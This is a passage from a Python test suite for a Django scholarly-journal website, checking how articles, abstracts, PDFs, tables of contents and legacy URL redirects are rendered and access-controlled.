if article_type == 'compterendu':
assert note in div.decode()
else:
assert note not in div.decode()
def test_verbatim_poeme_lines(self):
article = ArticleFactory(
from_fixture='1062061ar',
issue__journal__open_access=True,
)
url = article_detail_url(article)
html = Client().get(url).content.decode()
dom = BeautifulSoup(html, 'html.parser')
poeme = dom.find('blockquote', {'class': 'verbatim poeme'})
# Check that poems lines are displayed in <p>.
assert poeme.decode() == '<blockquote class="verbatim poeme">\n<div class="bloc">\n<p ' \
'class="ligne">Jour de larme, </p>\n<p class="ligne">jour où ' \
'les coupables se réveilleront</p>\n<p class="ligne">pour ' \
'entendre leur jugement,</p>\n<p class="ligne">alors, ô Dieu, ' \
'pardonne-leur et leur donne le repos.</p>\n<p class="ligne">' \
'Jésus, accorde-leur le repos.</p>\n</div>\n</blockquote>'
def test_verbatim_poeme_horizontal_align(self):
article = ArticleFactory(
from_fixture='1070671ar',
issue__journal__open_access=True,
)
url = article_detail_url(article)
html = Client().get(url).content.decode()
dom = BeautifulSoup(html, 'html.parser')
poeme = dom.find('blockquote', {'class': 'verbatim poeme'}).decode()
# Check that poems lines are centered (align-center).
assert poeme == '<blockquote class="verbatim poeme">\n' \
'<div class="bloc align align-center">\n' \
'<p class="ligne">On the land</p>\n' \
'</div>\n' \
'<div class="bloc align align-center">\n' \
'<p class="ligne">On the water</p>\n' \
'</div>\n' \
'<div class="bloc align align-center">\n' \
'<p class="ligne">Held in <span class="majuscule">Senćoŧen\n' \
' </span>kinship</p>\n' \
'</div>\n' \
'<div class="bloc align align-center">\n' \
'<p class="ligne">Today is the future</p>\n' \
'</div>\n' \
'<div class="bloc align align-center">\n' \
'<p class="ligne">It belongs to the next generations</p>\n' \
'</div>\n' \
'<div class="bloc align align-center">\n' \
'<p class="ligne">of learners — dreamers — healers</p>\n' \
'</div>\n' \
'<div class="bloc align align-center">\n' \
'<p class="ligne">Maybe one day we will move beyond territorial\n' \
' acknowledgement</p>\n' \
'</div>\n' \
'<div class="bloc align align-center">\n' \
'<p class="ligne">and gather here in a good way</p>\n' \
'</div>\n' \
'<div class="bloc align align-center">\n' \
'<p class="ligne">so that the land and their kin</p>\n' \
'</div>\n' \
'<div class="bloc align align-center">\n' \
'<p class="ligne">can introduce themselves.</p>\n' \
'</div>\n' \
'</blockquote>'
def test_grfigure_caption_position(self):
article = ArticleFactory(
from_fixture='1062105ar',
issue__journal__open_access=True,
)
url = article_detail_url(article)
html = Client().get(url).content.decode()
dom = BeautifulSoup(html, 'html.parser')
grfigure = dom.find('div', {'id': 'gf1'})
grfigure_caption = grfigure.find_all('div', {'class': 'grfigure-caption'})[0]
grfigure_legende = grfigure.find_all('div', {'class': 'grfigure-legende'})[0]
assert grfigure_caption.decode() == '<div class="grfigure-caption">\n<p class="no">' \
'Figure 1</p>\n<div class="legende"></div>\n</div>'
assert grfigure_legende.decode() == '<div class="grfigure-legende">\n<p class="alinea">' \
'<sup>a</sup> Hommes et femmes des générations ' \
'enquêtées (1930-1950 résidant en ' \
'Île-de-France en 1999) et leurs parents.</p>\n' \
'<p class="alinea"><sup>b</sup> L’interprétation de ' \
'cette figure se fait par exemple de la ' \
'manière suivante : Parmi les Ego hommes de ' \
'profession « indépendants », 44 % ont déclaré ' \
'que la profession principale de leur père ' \
'était indépendant, 22,5 % ouvrier, 11,9 % cadre, ' \
'etc. L’origine « père indépendant » est ' \
'nettement surreprésentée chez les Ego hommes ' \
'indépendants. C’est aussi l’origine la plus ' \
'fréquente pour les Ego femmes indépendantes ' \
'(31,5 %), suivie par un père cadre (28,7 %).</p>\n' \
'</div>'
def test_no_liensimple_in_toc_heading(self):
article = ArticleFactory(
from_fixture='1062434ar',
issue__journal__open_access=True,
)
url = article_detail_url(article)
html = Client().get(url).content.decode()
dom = BeautifulSoup(html, 'html.parser')
li = dom.find('li', {'class': 'article-toc--body'}).find('ul').find_all('li')
# Check that liensimple nodes are not displayed as links in TOC headings.
assert li[1].decode() == '<li><a href="#s1n4">«\xa0D’une vaine dispute – La Musique ' \
'plaisir de l’esprit ou jouissance sensuelle\xa0» par ' \
'Charles Koechlin, (<em><span class="souligne">La Revue ' \
'musicale, 1921</span></em>)</a></li>'
assert li[2].decode() == '<li><a href="#s1n6">« Réponse à quelques objections » par ' \
'Désiré Pâque (<em><span class="souligne">La Revue ' \
'musicale, 1935</span></em>)</a></li>'
def test_related_articles(self, monkeypatch):
journal = JournalFactory()
article_1 = ArticleFactory(issue__journal=journal)
article_2 = ArticleFactory(issue__journal=journal)
article_3 = ArticleFactory(issue__journal=journal)
article_4 = ArticleFactory(issue__journal=journal)
# Mock return value for get_journal_related_articles().
journal_related_articles = []
for article in [article_1, article_2, article_3, article_4]:
journal_related_articles.append(SolrArticle({
'RevueID': article.issue.journal.localidentifier,
'NumeroID': article.issue.localidentifier,
'ID': article.localidentifier,
}))
# Simulate a Solr result with an issue that is not in Fedora.
journal_related_articles.append(SolrArticle({
'RevueID': journal.localidentifier,
'NumeroID': 'not_in_fedora',
'ID': 'not_in_fedora',
}))
# Patch get_journal_related_articles() so it returns our mocked return value.
monkeypatch.setattr(
FakeSolrData,
'get_journal_related_articles',
unittest.mock.Mock(
return_value=journal_related_articles,
),
)
# Create the current article, which should not appear in the related articles.
current_article = ArticleFactory(
issue__journal=journal,
localidentifier='current_article',
)
# Get the response.
url = article_detail_url(current_article)
html = Client().get(url).content
# Get the HTML.
dom = BeautifulSoup(html, 'html.parser')
footer = dom.find('footer', {'class': 'container'})
# There should only be 4 related articles.
assert len(footer.find_all('article')) == 4
# The current article should not be in the related articles.
assert 'current_article' not in footer.decode()
# An article with no issue should not be in related articles.
assert 'not_in_fedora' not in footer.decode()
@pytest.mark.parametrize('with_pdf, pages, has_abstracts, open_access, expected_result', (
# If there's no PDF, there's no need to include `can_display_first_pdf_page` in the context.
(False, [], False, True, False),
# If the article has abstracts, there's no need to include `can_display_first_pdf_page` in
# the context.
(True, [1, 2], True, True, False),
# If content access is granted, `can_display_first_pdf_page` should always be True.
(True, [1], False, True, True),
(True, [1, 2], False, True, True),
# If content access is not granted, `can_display_first_pdf_page` should only be True if the
# PDF has more than one page.
(True, [1], False, False, False),
(True, [1, 2], False, False, True),
))
def test_can_display_first_pdf_page(
self, with_pdf, pages, has_abstracts, open_access, expected_result, monkeypatch,
):
monkeypatch.setattr(pikepdf._qpdf.Pdf, 'pages', pages)
article = ArticleFactory(
issue__journal__open_access=open_access,
with_pdf=with_pdf,
)
if has_abstracts:
with repository.api.open_article(article.pid) as wrapper:
wrapper.set_abstracts([{'lang': 'fr', 'content': 'Résumé'}])
url = article_detail_url(article)
response = Client().get(url)
if not with_pdf or has_abstracts:
assert 'can_display_first_pdf_page' not in response.context.keys()
else:
assert response.context['can_display_first_pdf_page'] == expected_result
@pytest.mark.parametrize('open_access', (True, False))
@pytest.mark.parametrize('url_name', (
'public:journal:article_detail',
'public:journal:article_summary',
))
def test_complete_processing_article_with_abstracts(self, url_name, open_access):
article = ArticleFactory(
from_fixture='1058611ar',
issue__journal__open_access=open_access,
)
url = reverse(url_name, kwargs={
'journal_code': article.issue.journal.code,
'issue_slug': article.issue.volume_slug,
'issue_localid': article.issue.localidentifier,
'localid': article.localidentifier,
})
html = Client().get(url).content.decode()
dom = BeautifulSoup(html, 'html.parser')
full_article = dom.find('div', {'class': 'full-article'})
# Abstracts should be displayed in all cases.
assert full_article.find_all('section', {'id': 'resume'})
# The article body should only be displayed on detail page if content access is granted.
if open_access and url_name == 'public:journal:article_detail':
assert full_article.find_all('section', {'id': 'corps'})
else:
assert not full_article.find_all('section', {'id': 'corps'})
# PDF, PDF first page or 600 first words should never be displayed because we have complete
# processing with abstracts.
assert not full_article.find_all('section', {'id': 'pdf'})
assert not full_article.find_all('section', {'id': 'first-pdf-page'})
assert not full_article.find_all('section', {'id': 'first-600-words'})
@pytest.mark.parametrize('open_access', (True, False))
@pytest.mark.parametrize('url_name', (
'public:journal:article_detail',
'public:journal:article_summary',
))
def test_complete_processing_article_without_abstracts(self, url_name, open_access):
article = ArticleFactory(
from_fixture='1005860ar',
issue__journal__open_access=open_access,
)
url = reverse(url_name, kwargs={
'journal_code': article.issue.journal.code,
'issue_slug': article.issue.volume_slug,
'issue_localid': article.issue.localidentifier,
'localid': article.localidentifier,
})
html = Client().get(url).content.decode()
dom = BeautifulSoup(html, 'html.parser')
full_article = dom.find('div', {'class': 'full-article'})
# Abstracts should not be displayed because we have none.
assert not full_article.find_all('section', {'id': 'resume'})
# The article body should only be displayed on detail page if content access is granted.
if open_access and url_name == 'public:journal:article_detail':
assert full_article.find_all('section', {'id': 'corps'})
else:
assert not full_article.find_all('section', {'id': 'corps'})
# The first 600 words should only be displayed on summary page or if content access is not
# granted.
if not open_access or url_name == 'public:journal:article_summary':
assert full_article.find_all('section', {'id': 'first-600-words'})
else:
assert not full_article.find_all('section', {'id': 'first-600-words'})
# PDF or PDF first page should never be displayed because we have complete processing.
assert not full_article.find_all('section', {'id': 'pdf'})
assert not full_article.find_all('section', {'id': 'first-pdf-page'})
@pytest.mark.parametrize('open_access', (True, False))
@pytest.mark.parametrize('url_name', (
'public:journal:article_detail',
'public:journal:article_summary',
))
def test_minimal_processing_article_with_abstracts(self, url_name, open_access):
article = ArticleFactory(
from_fixture='602354ar',
issue__journal__open_access=open_access,
with_pdf=True,
)
url = reverse(url_name, kwargs={
'journal_code': article.issue.journal.code,
'issue_slug': article.issue.volume_slug,
'issue_localid': article.issue.localidentifier,
'localid': article.localidentifier,
})
html = Client().get(url).content.decode()
dom = BeautifulSoup(html, 'html.parser')
full_article = dom.find('div', {'class': 'full-article'})
# Abstracts should be displayed in all cases.
assert full_article.find_all('section', {'id': 'resume'})
# The article PDF should only be displayed on detail page if content access is granted.
if open_access and url_name == 'public:journal:article_detail':
assert full_article.find_all('section', {'id': 'pdf'})
else:
assert not full_article.find_all('section', {'id': 'pdf'})
# Article body, 600 first words or PDF first page should never be displayed because we have
# minimal processing with abstracts.
assert not full_article.find_all('section', {'id': 'corps'})
assert not full_article.find_all('section', {'id': 'first-600-words'})
assert not full_article.find_all('section', {'id': 'first-pdf-page'})
@pytest.mark.parametrize('open_access', (True, False))
@pytest.mark.parametrize('url_name', (
'public:journal:article_detail',
'public:journal:article_summary',
))
@pytest.mark.parametrize('pages', ([1], [1, 2]))
def test_minimal_processing_article_without_abstracts(self, pages, url_name, open_access):
article = ArticleFactory(
from_fixture='1056823ar',
issue__journal__open_access=open_access,
with_pdf=True,
)
url = reverse(url_name, kwargs={
'journal_code': article.issue.journal.code,
'issue_slug': article.issue.volume_slug,
'issue_localid': article.issue.localidentifier,
'localid': article.localidentifier,
})
html = Client().get(url).content.decode()
dom = BeautifulSoup(html, 'html.parser')
full_article = dom.find('div', {'class': 'full-article'})
# Abstracts should not be displayed because we have none.
assert not full_article.find_all('section', {'id': 'resume'})
# The article PDF should only be displayed on detail page if content access is granted.
if open_access and url_name == 'public:journal:article_detail':
assert full_article.find_all('section', {'id': 'pdf'})
else:
assert not full_article.find_all('section', {'id': 'pdf'})
# The article PDF first page should only be displayed on summary page or if content access
# is not granted.
if not open_access or url_name == 'public:journal:article_summary':
assert full_article.find_all('section', {'id': 'first-pdf-page'})
else:
assert not full_article.find_all('section', {'id': 'first-pdf-page'})
# Article body or 600 first words should never be displayed because we have minimal
# processing.
assert not full_article.find_all('section', {'id': 'corps'})
assert not full_article.find_all('section', {'id': 'first-600-words'})
@pytest.mark.parametrize('open_access', (True, False))
@pytest.mark.parametrize('url_name', (
'public:journal:article_detail',
'public:journal:article_summary',
))
def test_minimal_processing_article_without_abstracts_and_with_only_one_page(
self, url_name, open_access, monkeypatch
):
monkeypatch.setattr(pikepdf._qpdf.Pdf, 'pages', [1])
article = ArticleFactory(
from_fixture='1056823ar',
issue__journal__open_access=open_access,
with_pdf=True,
)
url = reverse(url_name, kwargs={
'journal_code': article.issue.journal.code,
'issue_slug': article.issue.volume_slug,
'issue_localid': article.issue.localidentifier,
'localid': article.localidentifier,
})
html = Client().get(url).content.decode()
dom = BeautifulSoup(html, 'html.parser')
full_article = dom.find('div', {'class': 'full-article'})
# Abstracts should not be displayed because we have none.
assert not full_article.find_all('section', {'id': 'resume'})
# The article PDF should only be displayed on detail page if content access is granted.
if open_access and url_name == 'public:journal:article_detail':
assert full_article.find_all('section', {'id': 'pdf'})
else:
assert not full_article.find_all('section', {'id': 'pdf'})
# The article PDF first page should only be displayed on summary page if content access is
# granted because the PDF has only one page.
if open_access and url_name == 'public:journal:article_summary':
assert full_article.find_all('section', {'id': 'first-pdf-page'})
else:
assert not full_article.find_all('section', {'id': 'first-pdf-page'})
# Article body or 600 first words should never be displayed because we have minimal
# processing.
assert not full_article.find_all('section', {'id': 'corps'})
assert not full_article.find_all('section', {'id': 'first-600-words'})
@pytest.mark.parametrize('has_abstracts, expected_alert', (
(True, 'Seul le résumé sera affiché.'),
(False, 'Seuls les 600 premiers mots du texte seront affichés.'),
))
def test_complete_processing_article_content_access_not_granted_alert(
self, has_abstracts, expected_alert,
):
article = ArticleFactory(issue__journal__open_access=False)
if has_abstracts:
with repository.api.open_article(article.pid) as wrapper:
wrapper.set_abstracts([{'lang': 'fr', 'content': 'Résumé'}])
url = article_detail_url(article)
html = Client().get(url).content.decode()
assert expected_alert in html
@pytest.mark.parametrize('has_abstracts, pages, expected_alert', (
(True, [1, 2], 'Seul le résumé sera affiché.'),
(True, [1], 'Seul le résumé sera affiché.'),
(False, [1, 2], 'Seule la première page du PDF sera affichée.'),
(False, [1], 'Seule la première page du PDF sera affichée.'),
))
def test_minimal_processing_article_content_access_not_granted_alert(
self, has_abstracts, pages, expected_alert, monkeypatch,
):
monkeypatch.setattr(pikepdf._qpdf.Pdf, 'pages', pages)
article = ArticleFactory(
from_fixture='1056823ar',
issue__journal__open_access=False,
with_pdf=True,
)
if has_abstracts:
with repository.api.open_article(article.pid) as wrapper:
wrapper.set_abstracts([{'lang': 'fr', 'content': 'Résumé'}])
url = article_detail_url(article)
html = Client().get(url).content.decode()
# The expected alert should only be displayed if there's abstracts or if the PDF has more
# than one page.
if has_abstracts or len(pages) > 1:
assert expected_alert in html
else:
assert expected_alert not in html
@pytest.mark.parametrize('fixture, section_id, expected_title', (
# Articles without specified titles in the XML, default values should be used.
('1054008ar', 'grnotebio', 'Note biographique'),
('1054008ar', 'grnote', 'Notes'),
('1059303ar', 'merci', 'Acknowledgements'),
# Articles with specified titles in the XML.
('009676ar', 'grnotebio', 'Collaboratrice'),
('009381ar', 'grnote', 'Notas'),
('1040250ar', 'merci', 'Remerciements et financement'),
))
def test_article_annex_section_titles(self, fixture, section_id, expected_title):
article = ArticleFactory(
from_fixture=fixture,
issue__journal__open_access=True,
)
url = article_detail_url(article)
html = Client().get(url).content.decode()
dom = BeautifulSoup(html, 'html.parser')
article_toc = dom.find('nav', {'class': 'article-table-of-contents'})
section = dom.find('section', {'id': section_id})
assert article_toc.find('a', {'href': '#' + section_id}).text == expected_title
assert section.find('h2').text == expected_title
@pytest.mark.parametrize('fixture, expected_title', (
('009676ar', 'Bibliographie'),
('1070621ar', 'Bibliography'),
('1054008ar', 'Références'),
))
def test_article_grbiblio_section_titles(self, fixture, expected_title):
article = ArticleFactory(
from_fixture=fixture,
issue__journal__open_access=True,
)
url = article_detail_url(article)
html = Client().get(url).content.decode()
dom = BeautifulSoup(html, 'html.parser')
article_toc = dom.find('nav', {'class': 'article-table-of-contents'})
section = dom.find('section', {'id': 'grbiblio'})
assert article_toc.find('a', {'href': '#biblio-1'}).text == expected_title
assert section.find('h2').text == expected_title
def test_media_object_source(self):
article = ArticleFactory(
from_fixture='1065018ar',
issue__journal__open_access=True,
)
url = article_detail_url(article)
html = Client().get(url).content.decode()
dom = BeautifulSoup(html, 'html.parser')
media_object = dom.find('div', {'class': 'media'})
assert media_object.find('cite', {'class': 'source'}).text == 'Courtesy of La compagnie'
def test_media_object_padding_bottom_based_on_aspect_ratio(self):
article = ArticleFactory(
from_fixture='1065018ar',
issue__journal__open_access=True,
)
url = article_detail_url(article)
html = Client().get(url).content.decode()
dom = BeautifulSoup(html, 'html.parser')
media_object = dom.find('div', {'class': 'embed-responsive'})
assert media_object.get('style') == 'padding-bottom: 56.563%'
@pytest.mark.parametrize('fixture, expected_section_titles', (
('1054008ar', [
'<h2>Suspension du verbe</h2>',
'<h2>Une éthique de l’action</h2>',
'<h3>1– Nécessité de limiter l’action.</h3>',
'<h3>2– Nécessité de simplifier, c’est-à-dire de réduire à l’essentiel.</h3>',
'<h3>3– Nécessité (pour l’homme) de se transformer.</h3>',
'<h2>Une «\xa0poéthique\xa0»</h2>',
'<h2>L’en avant de la parole</h2>',
]),
('1062105ar', [
'<h2><span class="majuscule">Introduction</span></h2>',
'<h2><span class="majuscule">1. La mesure de la mobilitÉ sociale en France et '
'au QuÉbec</span></h2>',
'<h2><span class="majuscule">2. MÉthodes</span></h2>',
'<h3>2.1 Présentation des deux enquêtes et des variables professionnelles '
'sélectionnées</h3>',
'<h3>2.2 Les codages effectués pour mesurer les transmissions '
'professionnelles</h3>',
'<h4><em>2.2.1 Genre et niveau de compétences</em></h4>',
'<h4><em>2.2.2 Catégories socioprofessionnelles</em></h4>',
'<h2><span class="majuscule">3. Évolution de la structure socioprofessionnelle '
'des emplois et transmissions professionnelles au sein des lignÉes</span></h2>',
'<h3>3.1 Répartition des positions socioprofessionnelles dans les lignées des '
'générations enquêtées</h3>',
'<h3>3.2 Transmissions professionnelles dans les lignées</h3>',
'<h2><span class="majuscule">Conclusion</span></h2>',
]),
))
def test_article_toc_view(self, fixture, expected_section_titles):
article = ArticleFactory(
from_fixture=fixture,
issue__journal__open_access=True,
)
url = reverse('public:journal:article_toc', kwargs={
'journal_code': article.issue.journal.code,
'issue_slug': article.issue.volume_slug,
'issue_localid': article.issue.localidentifier,
'localid': article.localidentifier,
})
html = Client().get(url).content.decode()
for section_title in expected_section_titles:
assert section_title in html
@pytest.mark.parametrize('mock_is_external, mock_url, expected_status_code', [
(False, None, 200),
(True, 'http://www.example.com', 301),
])
def test_get_external_issues_are_redirected(self, mock_is_external, mock_url, expected_status_code, monkeypatch):
monkeypatch.setattr(Article, 'is_external', mock_is_external)
monkeypatch.setattr(Article, 'url', mock_url)
article = ArticleFactory()
url = article_detail_url(article)
response = Client().get(url)
assert response.status_code == expected_status_code
if mock_url:
assert response.url == mock_url
def test_marquage_in_affiliations(self):
article = ArticleFactory(from_fixture='1066010ar')
url = article_detail_url(article)
html = Client().get(url).content.decode()
assert '<li class="auteur-affiliation"><p><strong>Benoit\n Vaillancourt</strong><br>' \
'<span class="petitecap">C</span><span class="petitecap">élat</span>' \
'<span class="petitecap">, Ipac, </span>Université Laval</p></li>' in html
@pytest.mark.parametrize('fixture, expected_link', (
# `https://` should be added to URLs that starts with `www`.
('1038424ar', '<a href="https://www.inspq.qc.ca/pdf/publications/1177_RelGazSchisteSante' \
'%20PubRapPreliminaire.pdf" id="ls3" target="_blank">www.inspq.qc.ca/pdf/' \
'publications/1177_RelGazSchisteSante PubRapPreliminaire.pdf</a>'),
# `https://` should not be added to email addresses.
('1038424ar', '<a href="mailto:yenny.vega.cardenas@umontreal.ca" id="ls1" ' \
'target="_blank">yenny.vega.cardenas@umontreal.ca</a>'),
# Complete URLs should not be altered.
('1038424ar', '<a href="http://www.nytimes.com/2014/12/18/nyregion/cuomo-to-ban-fracking-' \
'in-new-york-state-citing-health-risks.html?_r=0" id="ls4" target="_blank">' \
'http://www.nytimes.com/2014/12/18/nyregion/cuomo-to-ban-fracking-' \
'in-new-york-state-citing-health-risks.html?_r=0</a>'),
# Links to `http://www.erudit.org` should not have target="_blank".
('009256ar', '<a href="http://www.erudit.org/revue/ron/1998/v/n9" id="ls1">' \
'http://www.erudit.org/revue/ron/1998/v/n9</a>'),
))
def test_liensimple_urls(self, fixture, expected_link):
article = ArticleFactory(from_fixture=fixture)
url = article_detail_url(article)
html = Client().get(url).content.decode()
assert expected_link in html
def test_no_white_spaces_around_objetmedia(self):
article = ArticleFactory(
from_fixture='1067517ar',
localidentifier='article',
issue__year='2020',
issue__localidentifier='issue',
issue__journal__code='journal',
issue__journal__open_access=True,
)
url = article_detail_url(article)
html = Client().get(url).content.decode()
# No unwanted extra spaces in addition of wanted non-breaking spaces inside quotes.
assert '«\xa0<img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwC' \
'AAAAC0lEQVR42mNkYAAAAAYAAjCB0C8AAAAASUVORK5CYII=" ' \
'data-srcset="/fr/revues/journal/2020-issue/article/media/2127962n.jpg 16w" ' \
'data-aspectratio="0.941176470588235" width="16" height="17" class="lazyload" ' \
'id="im10" alt="forme: forme pleine grandeur">\xa0U+1F469 woman\xa0»' in html
# No unwanted extra spaces inside parentheses.
assert '(<img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAA' \
'C0lEQVR42mNkYAAAAAYAAjCB0C8AAAAASUVORK5CYII=" ' \
'data-srcset="/fr/revues/journal/2020-issue/article/media/2127980n.jpg 17w" ' \
'data-aspectratio="1.307692307692308" width="17" height="13" class="lazyload" ' \
'id="im34" alt="forme: forme pleine grandeur">)' in html
# No unwanted extra spaces after hashtag.
assert '#<img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAA' \
'C0lEQVR42mNkYAAAAAYAAjCB0C8AAAAASUVORK5CYII=" ' \
'data-srcset="/fr/revues/journal/2020-issue/article/media/2127981n.jpg 32w" ' \
'data-aspectratio="1.684210526315789" width="32" height="19" class="lazyload" ' \
'id="im35" alt="forme: forme pleine grandeur">' in html
def test_footnote_in_bibliography_title(self):
article = ArticleFactory(from_fixture='1068385ar')
url = article_detail_url(article)
html = Client().get(url).content.decode()
assert '<h2 id="biblio-1">Bibliographie sélective<a href="#no49" id="re1no49" class="norenvoi" ' \
'title="La bibliographie recense exclusivement les travaux cités dans l’article. ' \
'En complément, la base de données des logiciels et projets (cf.\xa0note 2) ' \
'propose pour l’ensemble des logicie[…]">[49]</a>\n</h2>' in html
assert '<li><a href="#biblio-1">Bibliographie sélective</a></li>' in html
def test_organistaion_as_author_is_displayed_in_bold(self):
article = ArticleFactory(from_fixture='1068900ar')
url = article_detail_url(article)
html = Client().get(url).content.decode()
assert '<li class="auteur-affiliation">' \
'<p><strong>The MAP Research Team</strong></p>' \
'</li>' in html
def test_appendices_titles_language(self):
article = ArticleFactory(
from_fixture='1069092ar',
issue__journal__open_access=True,
)
url = article_detail_url(article)
html = Client().get(url).content.decode()
dom = BeautifulSoup(html, 'html.parser')
sections = dom.find_all('section', {'class': 'grnotebio'})
assert len(sections) == 3
assert sections[0].find('h2').decode() == '<h2>Notes biographiques</h2>'
assert sections[1].find('h2').decode() == '<h2>Biographical notes</h2>'
assert sections[2].find('h2').decode() == '<h2>Notas biograficas</h2>'
class TestArticleRawPdfView:
@unittest.mock.patch.object(JournalDigitalObject, 'logo')
@unittest.mock.patch.object(ArticleDigitalObject, 'pdf')
@unittest.mock.patch.object(subprocess, 'check_call')
def test_can_retrieve_the_pdf_of_existing_articles(self, mock_check_call, mock_pdf, mock_logo):
with open(os.path.join(FIXTURE_ROOT, 'dummy.pdf'), 'rb') as f:
mock_pdf.content = io.BytesIO()
mock_pdf.content.write(f.read())
with open(os.path.join(FIXTURE_ROOT, 'logo.jpg'), 'rb') as f:
mock_logo.content = io.BytesIO()
mock_logo.content.write(f.read())
journal = JournalFactory()
issue = IssueFactory.create(
journal=journal, year=2010,
date_published=dt.datetime.now() - dt.timedelta(days=1000))
IssueFactory.create(
journal=journal, year=2010,
date_published=dt.datetime.now())
article = ArticleFactory.create(issue=issue)
journal_id = journal.localidentifier
issue_id = issue.localidentifier
article_id = article.localidentifier
url = article_raw_pdf_url(article)
request = RequestFactory().get(url)
request.user = AnonymousUser()
request.session = {}
request.subscriptions = UserSubscriptions()
response = ArticleRawPdfView.as_view()(
request, journal_code=journal_id, issue_slug=issue.volume_slug, issue_localid=issue_id,
localid=article_id)
assert response.status_code == 200
assert response['Content-Type'] == 'application/pdf'
def test_cannot_retrieve_the_pdf_of_inexistant_articles(self):
# Note: as there is no Erudit fedora repository used during the
# test, any tentative of retrieving the PDF of an article should
# fail.
journal_id = 'dummy139'
issue_slug = 'test'
issue_id = 'dummy1515298'
article_id = '1001942du'
url = reverse('public:journal:article_raw_pdf', args=(
journal_id, issue_slug, issue_id, article_id
))
response = Client().get(url)
assert response.status_code == 404
@unittest.mock.patch.object(ArticleDigitalObject, 'pdf')
@unittest.mock.patch.object(subprocess, 'check_call')
@pytest.mark.parametrize('pages, expected_exception', [
([], True),
([1], True),
([1, 2], False),
])
def test_can_retrieve_the_firstpage_pdf_of_existing_articles(self, mock_check_call, mock_pdf, pages, expected_exception, monkeypatch):
monkeypatch.setattr(pikepdf._qpdf.Pdf, 'pages', pages)
with open(os.path.join(FIXTURE_ROOT, 'dummy.pdf'), 'rb') as f:
mock_pdf.content = io.BytesIO()
mock_pdf.content.write(f.read())
journal = JournalFactory()
issue = IssueFactory.create(
journal=journal, year=2010,
date_published=dt.datetime.now() - dt.timedelta(days=1000))
IssueFactory.create(
journal=journal, year=2010,
date_published=dt.datetime.now())
article = ArticleFactory.create(issue=issue)
journal_id = journal.localidentifier
issue_id = issue.localidentifier
article_id = article.localidentifier
url = article_raw_pdf_url(article)
request = RequestFactory().get(url)
request.user = AnonymousUser()
request.session = {}
request.subscriptions = UserSubscriptions()
# Raise exception if PDF has less than 2 pages.
if expected_exception:
with pytest.raises(PermissionDenied):
response = ArticleRawPdfFirstPageView.as_view()(
request, journal_code=journal_id, issue_slug=issue.volume_slug, issue_localid=issue_id,
localid=article_id)
else:
response = ArticleRawPdfFirstPageView.as_view()(
request, journal_code=journal_id, issue_slug=issue.volume_slug, issue_localid=issue_id,
localid=article_id)
assert response.status_code == 200
assert response['Content-Type'] == 'application/pdf'
def test_cannot_be_accessed_if_the_article_is_not_in_open_access(self):
journal = JournalFactory(open_access=False)
issue = IssueFactory.create(
journal=journal, year=dt.datetime.now().year, date_published=dt.datetime.now())
article = ArticleFactory.create(issue=issue)
journal_code = journal.code
issue_id = issue.localidentifier
article_id = article.localidentifier
url = article_raw_pdf_url(article)
request = RequestFactory().get(url)
request.user = AnonymousUser()
request.session = {}
request.subscriptions = UserSubscriptions()
response = ArticleRawPdfView.as_view()(
request, journal_code=journal_code, issue_slug=issue.volume_slug,
issue_localid=issue_id, localid=article_id)
assert isinstance(response, HttpResponseRedirect)
assert response.url == article_detail_url(article)
def test_cannot_be_accessed_if_the_publication_of_the_article_is_not_allowed_by_its_authors(self): # noqa
journal = JournalFactory(open_access=False)
issue = IssueFactory.create(
journal=journal, year=2010, date_published=dt.datetime.now())
article = ArticleFactory.create(issue=issue, publication_allowed=False)
journal_code = journal.code
issue_id = issue.localidentifier
article_id = article.localidentifier
url = article_raw_pdf_url(article)
request = RequestFactory().get(url)
request.user = AnonymousUser()
request.session = {}
request.subscriptions = UserSubscriptions()
response = ArticleRawPdfView.as_view()(
request, journal_code=journal_code, issue_slug=issue.volume_slug,
issue_localid=issue_id, localid=article_id)
assert isinstance(response, HttpResponseRedirect)
assert response.url == article_detail_url(article)
class TestLegacyUrlsRedirection:
def test_can_redirect_issue_support_only_volume_and_year(self):
journal = JournalFactory(code='test')
issue = IssueFactory(journal=journal, volume="1", number="1", year="2017")
IssueFactory(journal=issue.journal, volume="1", number="2", year="2017")
article = ArticleFactory()
article.issue.volume = "1"
article.issue.number = "1"
article.issue.year = "2017"
article.issue.save()
article2 = ArticleFactory()
article2.issue.journal = article.issue.journal
article2.issue.volume = "1"
article2.issue.number = "2"
article2.issue.year = "2017"
article2.issue.save()
url = "/revue/{journal_code}/{year}/v{volume}/n/".format(
journal_code=article.issue.journal.code,
year=article.issue.year,
volume=article.issue.volume,
)
resp = Client().get(url)
assert resp.url == reverse('public:journal:issue_detail', kwargs=dict(
journal_code=article2.issue.journal.code,
issue_slug=article2.issue.volume_slug,
localidentifier=article2.issue.localidentifier,
))
def test_can_redirect_issue_detail_with_empty_volume(self):
issue = IssueFactory(number="1", volume="1", year="2017")
issue2 = IssueFactory(journal=issue.journal, volume="2", number="1", year="2017")
url = "/revue/{journal_code}/{year}/v/n{number}/".format(
journal_code=issue.journal.code,
number=issue.number,
year=issue.year,
)
resp = Client().get(url)
assert resp.url == reverse('public:journal:issue_detail', kwargs=dict(
journal_code=issue2.journal.code,
issue_slug=issue2.volume_slug,
localidentifier=issue2.localidentifier,
))
def test_can_redirect_article_from_legacy_urls(self):
from django.utils.translation import deactivate_all
article = ArticleFactory()
article.issue.volume = "1"
article.issue.save()
url = '/revue/{journal_code}/{issue_year}/v{issue_volume}/n/{article_localidentifier}.html'.format( # noqa
journal_code=article.issue.journal.code,
issue_year=article.issue.year,
issue_volume=article.issue.volume,
article_localidentifier=article.localidentifier
)
resp = Client().get(url)
assert resp.status_code == 301
url = '/revue/{journal_code}/{issue_year}/v/n/{article_localidentifier}.html'.format( # noqa
journal_code=article.issue.journal.code,
issue_year=article.issue.year,
article_localidentifier=article.localidentifier
)
resp = Client().get(url)
assert resp.status_code == 301
url = '/revue/{journal_code}/{issue_year}/v/n{issue_number}/{article_localidentifier}.html'.format( # noqa
journal_code=article.issue.journal.code,
issue_year=article.issue.year,
issue_number=article.issue.number,
article_localidentifier=article.localidentifier
)
resp = Client().get(url)
assert resp.url == article_detail_url(article)
assert "/fr/" in resp.url
assert resp.status_code == 301
deactivate_all()
resp = Client().get(url + "?lang=en")
assert resp.url == article_detail_url(article)
assert "/en/" in resp.url
assert resp.status_code == 301
